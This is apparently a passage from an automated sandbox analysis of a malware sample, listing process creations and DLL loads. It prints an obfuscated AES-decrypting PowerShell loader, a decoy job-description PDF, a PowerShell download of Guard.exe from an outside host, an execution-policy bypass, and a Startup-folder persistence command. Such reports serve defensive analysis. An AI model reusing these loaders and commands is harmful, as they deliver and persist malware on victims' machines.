357A03846B92931A330644457340BF7331A6CB5739F22119D33470250D70590A6F1C0A08150EEFA53A0927BB4D168D44A2E0B9B78DE17426C1F82271F18F27203AEE39AEEBE330B479B2B38EE5AA510053589FB1166A4E42792D1BC64A75A303766AC764A47348073E49C426C770FA5B5AEAA2AE449E423CD35861340656797A23C1FD752A26B13575CE28A7313CF32508080F609F9BD9B56F8F7A6D04B10CDDC40B660686C1C2A6F90B8CDA50B1EFA31BF0A15852D8D00C56B7516118FEF0030E99C46248CE4B26E648D5F49111F4000436F9B68A5B8062614B4E5179666A715556704755565176';function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\BnQwAP.exe "C:\Users\user\AppData\Roaming\BnQwAP.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1616,i,16373349634998890577,12593525989554583629,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
